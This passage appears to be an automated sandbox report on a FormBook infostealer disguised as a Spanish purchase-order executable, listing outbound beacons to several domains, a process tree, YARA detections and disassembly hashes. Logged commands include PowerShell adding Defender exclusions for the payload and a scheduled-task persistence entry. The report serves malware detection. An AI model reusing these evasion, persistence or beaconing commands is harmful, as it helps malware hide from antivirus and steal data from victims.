                                          Data Raw: 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20
                                          Data Ascii: } footer span { margin: 0 11px; font-size: 1em; font-weight: 400; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 400; color: #191919; } @media (max-width: 600px) { body {


                                          Session ID:2
                                          Source IP:192.168.2.6
                                          Source Port:49732
                                          Destination IP:203.196.8.7
                                          Destination Port:80
                                          PID:4004
                                          Process:C:\Windows\explorer.exe
                                          Timestamp:Jul 3, 2024 18:33:37.796874046 CEST
                                          Bytes transferred:180
                                          Direction:OUT
                                          Data:GET /md02/?TPXh=4AwpHqQNViPAc6H2SH6W32NBDbh/yf/Y2D8hgqFIHxnXsLrA8hdQjo1iXHj4HnJ/ZqvHoeNZWw==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1
                                          Host: www.tiantiying.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                          Session ID:3
                                          Source IP:192.168.2.6
                                          Source Port:49734
                                          Destination IP:15.197.142.173
                                          Destination Port:80
                                          PID:4004
                                          Process:C:\Windows\explorer.exe
                                          Timestamp:Jul 3, 2024 18:34:18.302843094 CEST
                                          Bytes transferred:191
                                          Direction:OUT
                                          Data:GET /md02/?TPXh=TC5sRGY/d0WrdY74L9um5PW4cqP23O9TC/qUYRxTqxu6QMwh8ii9j/dDz35GSdofbeImGevgjQ==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1
                                          Host: www.theopencomputeproject.net
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Timestamp:Jul 3, 2024 18:34:18.767915010 CEST
                                          Bytes transferred:266
                                          Direction:IN
                                          Data:HTTP/1.1 403 Forbidden
                                          Server: awselb/2.0
                                          Date: Wed, 03 Jul 2024 16:34:18 GMT
                                          Content-Type: text/html
                                          Content-Length: 118
                                          Connection: close
                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                          Session ID:4
                                          Source IP:192.168.2.6
                                          Source Port:49736
                                          Destination IP:192.250.227.27
                                          Destination Port:80
                                          PID:4004
                                          Process:C:\Windows\explorer.exe
                                          Timestamp:Jul 3, 2024 18:34:59.312115908 CEST
                                          Bytes transferred:190
                                          Direction:OUT
                                          Data:GET /md02/?TPXh=Cq7+/Ky+K6vI68NpDrm1YJYa3GKRdZGNexOywzaDimkbuuqps0atd8BONpkLeDzS4/cRTt0qqA==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1
                                          Host: www.equipoleiremnacional.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                          Session ID:5
                                          Source IP:192.168.2.6
                                          Source Port:49737
                                          Destination IP:3.33.130.190
                                          Destination Port:80
                                          PID:4004
                                          Process:C:\Windows\explorer.exe
                                          Timestamp:Jul 3, 2024 18:35:19.798968077 CEST
                                          Bytes transferred:182
                                          Direction:OUT
                                          Data:GET /md02/?TPXh=M1D20hrtEA0YXOf/HK2sZrZVDkFjWbXD84BuCtYvxk7BtbkSICST3Apq92N7VT2icGdL8Ejrhw==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1
                                          Host: www.detroitreels.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                          Session ID:6
                                          Source IP:192.168.2.6
                                          Source Port:49740
                                          Destination IP:198.185.159.144
                                          Destination Port:80
                                          Timestamp:Jul 3, 2024 18:36:00.832031965 CEST
                                          Bytes transferred:183
                                          Direction:OUT
                                          Data:GET /md02/?TPXh=Huvb14v0kOWfNfmpMWoBgNUO4U2JwQZ3Rl/9gDSI5Y6jcOUTIOoj4XqjJyszJ9ZVOt8xpVdhjQ==&nHLDZb=8p-HvnKhThQhTxm HTTP/1.1
                                          Host: www.upcyclecharms.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Timestamp:Jul 3, 2024 18:36:01.290170908 CEST
                                          Bytes transferred:1236
                                          Direction:IN
                                          Data:HTTP/1.1 400 Bad Request
                                          Cache-Control: no-cache, must-revalidate
                                          Content-Length: 2061
                                          Content-Type: text/html; charset=UTF-8
                                          Date: Wed, 03 Jul 2024 16:36:01 UTC
                                          Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                          Pragma: no-cache
                                          Server: Squarespace
                                          X-Contextid: KbvFUfwp/oeRfHS7w
                                          Connection: close
                                          Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 400; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 400; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em;
                                          Timestamp:Jul 3, 2024 18:36:01.290297985 CEST
                                          Bytes transferred:1124
                                          Direction:IN
                                          Data Raw: 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20
                                          Data Ascii: } footer span { margin: 0 11px; font-size: 1em; font-weight: 400; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 400; color: #191919; } @media (max-width: 600px) { body {


                                          Target ID:0
                                          Start time:12:31:53
                                          Start date:03/07/2024
                                          Path:C:\Users\user\Desktop\Orden de compra 0307AR24.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Orden de compra 0307AR24.exe"
                                          Imagebase:0xa70000
                                          File size:861'704 bytes
                                          MD5 hash:7BB0F568CE14D2350C704AEA2C4BC9DE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2165242288.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2165242288.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2165242288.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2165242288.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2165242288.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low
                                          Has exited:true

                                          Target ID:3
                                          Start time:12:31:58
                                          Start date:03/07/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Orden de compra 0307AR24.exe"
                                          Imagebase:0x6f0000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:4
                                          Start time:12:31:58
                                          Start date:03/07/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:5
                                          Start time:12:31:58
                                          Start date:03/07/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe"
                                          Imagebase:0x6f0000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:6
                                          Start time:12:31:58
                                          Start date:03/07/2024
                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp362B.tmp"
                                          Imagebase:0x540000
                                          File size:187'904 bytes
                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:7
                                          Start time:12:31:58
                                          Start date:03/07/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:8
                                          Start time:12:31:59
                                          Start date:03/07/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:9
                                          Start time:12:31:59
                                          Start date:03/07/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                          Imagebase:0xd90000
                                          File size:45'984 bytes
                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:high
                                          Has exited:true

                                          Target ID:10
                                          Start time:12:31:59
                                          Start date:03/07/2024
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Explorer.EXE
                                          Imagebase:0x7ff609140000
                                          File size:5'141'208 bytes
                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 0000000A.00000002.4559239704.000000001048C000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          Reputation:high
                                          Has exited:false

                                          Target ID:11
                                          Start time:12:32:01
                                          Start date:03/07/2024
                                          Path:C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe
                                          Imagebase:0x6b0000
                                          File size:861'704 bytes
                                          MD5 hash:7BB0F568CE14D2350C704AEA2C4BC9DE
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2239061216.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2239061216.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2239061216.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2239061216.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2239061216.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Antivirus matches:
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 26%, ReversingLabs
                                          Reputation:low
                                          Has exited:true

                                          Target ID:12
                                          Start time:12:32:01
                                          Start date:03/07/2024
                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                          Imagebase:0x7ff717f30000
                                          File size:496'640 bytes
                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false

                                          Target ID:13
                                          Start time:12:32:03
                                          Start date:03/07/2024
                                          Path:C:\Windows\SysWOW64\autoconv.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\SysWOW64\autoconv.exe"
                                          Imagebase:0x6f0000
                                          File size:842'752 bytes
                                          MD5 hash:A705C2ACED7DDB71AFB87C4ED384BED6
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:14
                                          Start time:12:32:03
                                          Start date:03/07/2024
                                          Path:C:\Windows\SysWOW64\systray.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\systray.exe"
                                          Imagebase:0x210000
                                          File size:9'728 bytes
                                          MD5 hash:28D565BB24D30E5E3DE8AFF6900AF098
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.4549121578.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.4549121578.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.4549121578.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.4549121578.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.4549121578.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.4549613061.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.4549613061.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.4549613061.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.4549613061.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.4549613061.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.4549675658.0000000004710000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.4549675658.0000000004710000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.4549675658.0000000004710000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.4549675658.0000000004710000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.4549675658.0000000004710000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:moderate
                                          Has exited:false

                                          Target ID:15
                                          Start time:12:32:06
                                          Start date:03/07/2024
                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp5339.tmp"
                                          Imagebase:0x540000
                                          File size:187'904 bytes
                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:16
                                          Start time:12:32:06
                                          Start date:03/07/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:17
                                          Start time:12:32:06
                                          Start date:03/07/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                          Imagebase:0xc40000
                                          File size:45'984 bytes
                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:18
                                          Start time:12:32:07
                                          Start date:03/07/2024
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                          Imagebase:0x1c0000
                                          File size:236'544 bytes
                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:19
                                          Start time:12:32:07
                                          Start date:03/07/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:21
                                          Start time:12:32:13
                                          Start date:03/07/2024
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\rundll32.exe"
                                          Imagebase:0xb0000
                                          File size:61'440 bytes
                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Has exited:true


                                            Execution Graph

                                            Execution Coverage:11.5%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:234
                                            Total number of Limit Nodes:4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: !Y3E
                                            • API String ID: 0-2826621527
                                            • Opcode ID: a286a92ccfe10331149ddbf8bd3ca70cce8dd01bdbcaa30b5abfd69a2f0b5647
                                            • Instruction ID: 04463e9e0eeb87fee36bab689514248ed94a03560bb9f8933a5ac1f50c4807f3
                                            • Opcode Fuzzy Hash: a286a92ccfe10331149ddbf8bd3ca70cce8dd01bdbcaa30b5abfd69a2f0b5647
                                            • Instruction Fuzzy Hash: 77A19234B002199FE754DB79C858BAE7BF7BB88700F208469E906EB3A5DE74DC418B51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: T(z
                                            • API String ID: 0-3184255237
                                            • Opcode ID: d89105c83b3b225cbcfef76c84ac78f826e6461407eb5f48fbbc4c3fb01173d9
                                            • Instruction ID: 79504aa1a99613bb6b625f9ba3f093280cb976ec6ed4c753f3770f3303d285c0
                                            • Opcode Fuzzy Hash: d89105c83b3b225cbcfef76c84ac78f826e6461407eb5f48fbbc4c3fb01173d9
                                            • Instruction Fuzzy Hash: 04412A72F01209DBEB08DBB989517FFB6ABABC8604F149426D941EB344DAB29D018B51
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c91fca491c69ab883dc2f5d84c1187236c8786079306e4feb6f50e333e71d1c6
                                            • Instruction ID: b108d4961008e2803d80b032c8baf852da89d3f694d14f8adee91d99491ef775
                                            • Opcode Fuzzy Hash: c91fca491c69ab883dc2f5d84c1187236c8786079306e4feb6f50e333e71d1c6
                                            • Instruction Fuzzy Hash: D6A19F34B102199FEB44DB78C854BAE7BF7BB88700F108469EA06EB3A5DE749C418B51
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b642ec614a01386601ba36d9399e9f2239937d66a00e8b714d657325ecb39b0c
                                            • Instruction ID: b44fe7b0c878d4bb1afa867f6d1c071355f4006f61649251c4eb1129d5f8ea46
                                            • Opcode Fuzzy Hash: b642ec614a01386601ba36d9399e9f2239937d66a00e8b714d657325ecb39b0c
                                            • Instruction Fuzzy Hash: BA51AF34B412099FEB149F74D855BAE7AE7FB88700F20806AEA02EB395DA75CD418B50
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b045789f9415cc302e3ebb08aefa0effb36a39366f45a7d91d626587d6ce8dd3
                                            • Instruction ID: 0b15713fee9d8b125630211d2826d37e4bcb73a60706a1a4ca4bf8d225ec6bb4
                                            • Opcode Fuzzy Hash: b045789f9415cc302e3ebb08aefa0effb36a39366f45a7d91d626587d6ce8dd3
                                            • Instruction Fuzzy Hash: 77C04C25F4D528D6C9504D947D059F8FB3CD38F127F407151D30EA3012A260A1556554

                                            Control-flow Graph

                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04E27D06
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 45fd3005423337a4cd6e094ddacf5669df638f6cf6aa6a53e6953b0dc97b706f
                                            • Instruction ID: cae2b3dfccd97acf09f1c59eee956921846614745631762b4d32ae038effaab6
                                            • Opcode Fuzzy Hash: 45fd3005423337a4cd6e094ddacf5669df638f6cf6aa6a53e6953b0dc97b706f
                                            • Instruction Fuzzy Hash: 63A14071D00229DFEB14DF68C941BEDBBB2FF49314F1485AAE808A7240DB75A985CF91

                                            Control-flow Graph

                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04E27D06
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: d5e135a318a935ec351fec93cc3b3a78e0ac9bb1877e81dd5806abde283667a3
                                            • Instruction ID: dd4163328bd70273d0e563942620fc81db8671934381ee8a58dc82d41de0e428
                                            • Opcode Fuzzy Hash: d5e135a318a935ec351fec93cc3b3a78e0ac9bb1877e81dd5806abde283667a3
